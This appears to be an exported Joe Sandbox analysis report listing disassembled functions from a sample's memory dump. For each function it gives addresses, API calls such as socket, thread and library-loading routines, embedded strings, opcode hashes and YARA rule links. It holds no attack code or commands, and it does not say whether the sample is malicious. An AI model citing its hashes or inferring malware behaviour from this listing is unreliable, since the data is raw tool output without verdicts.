Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 2f2596f2634b75bb16c69e2c1d4a59297e3ecbae0e8f0959864bbce2d8889c0c
Instruction ID: 607cd007a456d8df9370a68fa06f65ade83132e06f6072c5dcb186b5a9a93ede
Opcode Fuzzy Hash: 2f2596f2634b75bb16c69e2c1d4a59297e3ecbae0e8f0959864bbce2d8889c0c
Instruction Fuzzy Hash: 0731D025B19A8285EB05AB99D940278E3A0EF55BA4FC80235DA3CC76D5DFBCE441C3B0

Function 00007FF7F12FBFB8 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F12FBFCD
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7F12FBFF2
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F12FC01C
std::_Facet_Register.LIBCPMT ref: 00007FF7F12FC093
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7F12FC0B4
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F12FC0C7

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 4c06fa54008ae1450115ce03cc9cd4127756d11a96b3224315f2ca14ff275531
Instruction ID: fb259a87554e0e59bde409f513b9219a2fbfbe721cb28d259086bb6667396114
Opcode Fuzzy Hash: 4c06fa54008ae1450115ce03cc9cd4127756d11a96b3224315f2ca14ff275531
Instruction Fuzzy Hash: 3C318626B0964281FB05FB99E840979E350EF45BA0F880135DA3D876D5DFFCE456D3A0

Function 00007FF7F1300384 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7F1300522
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F130084B

Strings

csm, xrefs: 00007FF7F13004CB
csm, xrefs: 00007FF7F1300549
csm, xrefs: 00007FF7F1300469

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 1450e7910df2c53ba28fb358c1b498bf6a87ceeb2d52a8fa13b614ac39839cd1
Instruction ID: 051aac51d06f4d76cb316176fd177a4a7a128c5d3b1f876d024cf913d7804dbd
Opcode Fuzzy Hash: 1450e7910df2c53ba28fb358c1b498bf6a87ceeb2d52a8fa13b614ac39839cd1
Instruction Fuzzy Hash: 05E1E273A087868AE710AF74D4802ACB7E0FF45788F55013ADAAD576DADF78E181C790

Function 00007FF7F131B344 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B353
FlsSetValue.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B389
FlsSetValue.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B3B6
FlsSetValue.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B3C7
FlsSetValue.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B3D8
SetLastError.KERNEL32(?,?,?,00007FF7F130B5F9,?,?,?,?,00007FF7F131DE93,?,?,00000000,00007FF7F131B22E), ref: 00007FF7F131B3F3

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: dce532b6b18bb86a58bf2bf6f37ac22d3fa730e69ce49d3211f4e3530c41c7d8
Instruction ID: a1b5d5242d833c2ae7a7b6e725205be6229f36e70c53efa1bc702871159e0137
Opcode Fuzzy Hash: dce532b6b18bb86a58bf2bf6f37ac22d3fa730e69ce49d3211f4e3530c41c7d8
Instruction Fuzzy Hash: 52118120E0864283FB54B771565507DE1A26F447B0F961B3CE93E266DADFECA41242A1

Function 00007FF7F12E4130 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 164COMMON

Download Yara Rule

APIs

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12E42AC

Strings

., xrefs: 00007FF7F12E4202
/, xrefs: 00007FF7F12E4176
/, xrefs: 00007FF7F12E41F6
/, xrefs: 00007FF7F12E4240

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=
String ID: .$/$/$/
API String ID: 356670603-2604304129
Opcode ID: e25a8a3b45c1b40d5966a32284b60424917e25bcc7804ecb259e86d44553addb
Instruction ID: 4a528eed3b4cc2888f14e63f0a8badebe072fd3bc57219a5b0a63ba3580577f0
Opcode Fuzzy Hash: e25a8a3b45c1b40d5966a32284b60424917e25bcc7804ecb259e86d44553addb
Instruction Fuzzy Hash: A1519611F0D2C345FF6167A494003799A915FA5B84FC9C135DABDCA7C6DFACE84283A2

Function 00007FF7F12A7EE0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 153networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF7F12A80B0

Strings

select/poll on SSL socket, errno: %d, xrefs: 00007FF7F12A80B6
shutdown and remove SSL, done -> %d, xrefs: 00007FF7F12A807E
SSL shutdown timeout, xrefs: 00007FF7F12A802B, 00007FF7F12A80DC
shutdown and remove SSL, start, xrefs: 00007FF7F12A7F3F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast
String ID: SSL shutdown timeout$select/poll on SSL socket, errno: %d$shutdown and remove SSL, done -> %d$shutdown and remove SSL, start
API String ID: 1452528299-2396177677
Opcode ID: b576131fc67ce8dc6753f437b066cf7bcccbfd615bf466cd8ef3c17111530857
Instruction ID: c86647759c1d0ec1eae6b5b815289725248644399ea498277d3c6e46e1af3c6d
Opcode Fuzzy Hash: b576131fc67ce8dc6753f437b066cf7bcccbfd615bf466cd8ef3c17111530857
Instruction Fuzzy Hash: D851E322B087928AEB51AB66A50027AE790FF45BE0F840035DEAD877D5DF7CF451C7A0

Function 00007FF7F12B7450 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 111networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF7F12B7543
WSAGetLastError.WS2_32 ref: 00007FF7F12B754D

Part of subcall function 00007FF7F12C5AB0: GetLastError.KERNEL32(?,?,?,?,?,00007FF7F12ADC46), ref: 00007FF7F12C5AD3

Strings

accepted_set(sock=%qd, remote=%s port=%d), xrefs: 00007FF7F12B761B
getpeername() failed with errno %d: %s, xrefs: 00007FF7F12B756D
ssrem inet_ntop() failed with errno %d: %s, xrefs: 00007FF7F12B75B5

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast$getpeername
String ID: accepted_set(sock=%qd, remote=%s port=%d)$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 664652874-3669066118
Opcode ID: f7a87c730a5082ba3a492a382c2ac385aa401dfb44943d0296f624a942536a79
Instruction ID: e53f60f2fa752c55782487bdc9bd1047dfa1f54ea50dada686cdd1b34fba3d73
Opcode Fuzzy Hash: f7a87c730a5082ba3a492a382c2ac385aa401dfb44943d0296f624a942536a79
Instruction Fuzzy Hash: 67518522B18BC286E720EF65E4403E9A360FB99784F805136DE9D47B96DFBCD185C790

Function 00007FF7F12DB300 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 00007FF7F12DB350
accept.WS2_32 ref: 00007FF7F12DB36F

Part of subcall function 00007FF7F12ED920: ioctlsocket.WS2_32 ref: 00007FF7F12ED939

Part of subcall function 00007FF7F12B7450: getpeername.WS2_32 ref: 00007FF7F12B7543
Part of subcall function 00007FF7F12B7450: WSAGetLastError.WS2_32 ref: 00007FF7F12B754D

closesocket.WS2_32 ref: 00007FF7F12DB3E3

Strings

Connection accepted from server, xrefs: 00007FF7F12DB3A0
Error accept()ing server connect, xrefs: 00007FF7F12DB38A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLastacceptclosesocketgetpeernamegetsocknameioctlsocket
String ID: Connection accepted from server$Error accept()ing server connect
API String ID: 623830651-1795061160
Opcode ID: 671b54b0704aeef497317513256e6fa4aebbaa681d6a7258eb80f3e5227969bb
Instruction ID: 0996a5b960678b531dd497a83606f07423875bfd02dd2319f11fadd839f13afe
Opcode Fuzzy Hash: 671b54b0704aeef497317513256e6fa4aebbaa681d6a7258eb80f3e5227969bb
Instruction Fuzzy Hash: 33319122708A4182E760EB55E4643AEB361FB497E4FC40235DEBD877D5CFACE5418790

Function 00007FF7F12F3376 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF7F12F33A7

Strings

Expire Date, xrefs: 00007FF7F12F3591, 00007FF7F12F35C4
Failed extracting certificate chain, xrefs: 00007FF7F12F3ED0
FALSE, xrefs: 00007FF7F12F337D
%s: %s, xrefs: 00007FF7F12F35CB

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: SimpleString::operator=
String ID: %s: %s$Expire Date$FALSE$Failed extracting certificate chain
API String ID: 356670603-1145006616
Opcode ID: e5193a71fbd77e7415084b522eabf649b5c018d75e81f5f31e2eca7ff4d5b9e7
Instruction ID: 2adeebb2c0c42ceae484ed654422bb43437bd2116ea44edfa6439e672847010a
Opcode Fuzzy Hash: e5193a71fbd77e7415084b522eabf649b5c018d75e81f5f31e2eca7ff4d5b9e7
Instruction Fuzzy Hash: BC215062B0878745EB60AB95E4802F9A791FF44798FC00032DD2D9B6DADFBCE544C7A0

Function 00007FF7F1314160 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7F1314185
GetProcAddress.KERNEL32 ref: 00007FF7F131419B
FreeLibrary.KERNEL32 ref: 00007FF7F13141C2

Strings

mscoree.dll, xrefs: 00007FF7F131417C
CorExitProcess, xrefs: 00007FF7F1314194

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 7753418e7f5b59b1857c2b44bf32ff681224de66c26ecb9a4b7354c23b7fd103
Instruction ID: da6429b9d520d441325fa03ab2e2e0c8b15a5aa89bb7df3e18d4cd5349e72256
Opcode Fuzzy Hash: 7753418e7f5b59b1857c2b44bf32ff681224de66c26ecb9a4b7354c23b7fd103
Instruction Fuzzy Hash: A5F0C221B19B0783EB14AB20E8443799360EF99BB1FD5023DCA7E452E4CFADE045D3A0

Function 00007FF7F12FF784 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FF7F12FF8A7
__AdjustPointer.LIBCMT ref: 00007FF7F12FF8F2

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f5032e0cc83a5b76d2c6ffb333611ad37586d5c38e90ebd814056ceaa53f5318
Instruction ID: 938ac2c00cb14554d80a7b75bb915131925a8f3306dba4a312edd45a1c9bc13f
Opcode Fuzzy Hash: f5032e0cc83a5b76d2c6ffb333611ad37586d5c38e90ebd814056ceaa53f5318
Instruction Fuzzy Hash: 18B1C223F0A64691EB69BB91D180238E394EF44B84F898435DE7D877D5DFBCE64183A0

Function 00007FF7F128E84C Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128E9A3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128E9A9
__std_exception_copy.LIBVCRUNTIME ref: 00007FF7F128EA45
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128EAC4
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF7F128EAEE

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
String ID:
API String ID: 2138705365-0
Opcode ID: 67138a13c051f2ea1599d0402960bcf59d0b5129e69f6316a665601d90c1bba5
Instruction ID: a7fbcf3a0123014e0bc9b5017629a31e3d883e62307db11dbc1454724a4d0d6f
Opcode Fuzzy Hash: 67138a13c051f2ea1599d0402960bcf59d0b5129e69f6316a665601d90c1bba5
Instruction Fuzzy Hash: 1E91DF73F14B4585EB009FA4D8403AC6360FB48BA8F549236DE6C97B99EFB8D594C390

Function 00007FF7F1336800 Relevance: 7.6, APIs: 5, Instructions: 122COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F133685D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F13368C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1336925
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1336989
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F13369ED

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 128756f8641a17f8a7daf58ede0b23abeff417d1af0bd7bb739d1d1a0c1d64a7
Instruction ID: 54bf12f9bd5e6f5d620d6b76052c4236d6744a0087d3715fcbc6085ae2d84fba
Opcode Fuzzy Hash: 128756f8641a17f8a7daf58ede0b23abeff417d1af0bd7bb739d1d1a0c1d64a7
Instruction Fuzzy Hash: FC51A4E0F086C686FB05BB29E844378E751EF45B84FD10039D6BC066D2DFECA58083A5

Function 00007FF7F1312AAC Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1312AD7
CreateThread.KERNEL32 ref: 00007FF7F1312B18
GetLastError.KERNEL32(?,?,?,?,0000000C,00007FF7F12C9540), ref: 00007FF7F1312B26
CloseHandle.KERNEL32(?,?,?,?,0000000C,00007FF7F12C9540), ref: 00007FF7F1312B3C
FreeLibrary.KERNEL32(?,?,?,?,0000000C,00007FF7F12C9540), ref: 00007FF7F1312B4B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: d410c2e341d753668c7562e465c2f3fe3dced3562e905be142106d32ebfa3c1e
Instruction ID: 7ffb88e5dd67c05672634c9efbb54a94e022cb3e0bbb2389be5ced7d2ac18014
Opcode Fuzzy Hash: d410c2e341d753668c7562e465c2f3fe3dced3562e905be142106d32ebfa3c1e
Instruction Fuzzy Hash: A0214A25E09B4286EF14AF65A440079E3A0BF84BA0F99453DEE6D537D9DFBCE40086A0

Function 00007FF7F132BCC4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7F132BCEC
_set_statfp.LIBCMT ref: 00007FF7F132BD07
_set_statfp.LIBCMT ref: 00007FF7F132BD23
_set_statfp.LIBCMT ref: 00007FF7F132BD5F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
Instruction ID: 0afaa65ee5d4efbe20ca0eca3c35c58c6fe705a64382ae25f2af0caa163a1fd4
Opcode Fuzzy Hash: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
Instruction Fuzzy Hash: AD11B262E18AD743F7643924E5553F9C0516F58374F8902BCE97E4B2EE8FEC684441A3

Function 00007FF7F131B40C Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7F1302ECB,?,?,00000000,00007FF7F1303166,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F131B42B
FlsSetValue.KERNEL32(?,?,?,00007FF7F1302ECB,?,?,00000000,00007FF7F1303166,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F131B44A
FlsSetValue.KERNEL32(?,?,?,00007FF7F1302ECB,?,?,00000000,00007FF7F1303166,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F131B472
FlsSetValue.KERNEL32(?,?,?,00007FF7F1302ECB,?,?,00000000,00007FF7F1303166,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F131B483
FlsSetValue.KERNEL32(?,?,?,00007FF7F1302ECB,?,?,00000000,00007FF7F1303166,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F131B494

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: b2f47840b8b9c5c009bb9f6ec95be3edb16bf4979d371b13d5ff5d5a9b2b6ba9
Instruction ID: 29c8475f6aadcf01a65594c476ca974dcdfe34df487094e74172c12a30c228bf
Opcode Fuzzy Hash: b2f47840b8b9c5c009bb9f6ec95be3edb16bf4979d371b13d5ff5d5a9b2b6ba9
Instruction Fuzzy Hash: 4B117220E0824243FB54B7B19641579D1A15F543F0F9AA73DD53D367D9DFACA40242A1

Function 00007FF7F131B2A0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B2B1
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B2D0
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B2F8
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B309
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B31A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: b38a0812632c02c16b83cc3975993a7e914d995941d3d7188eeb23bda1f3a1e8
Instruction ID: 84cca99251e2f6981cc73c92118cdfa91bb5463653c93d650deb12411c41cdc9
Opcode Fuzzy Hash: b38a0812632c02c16b83cc3975993a7e914d995941d3d7188eeb23bda1f3a1e8
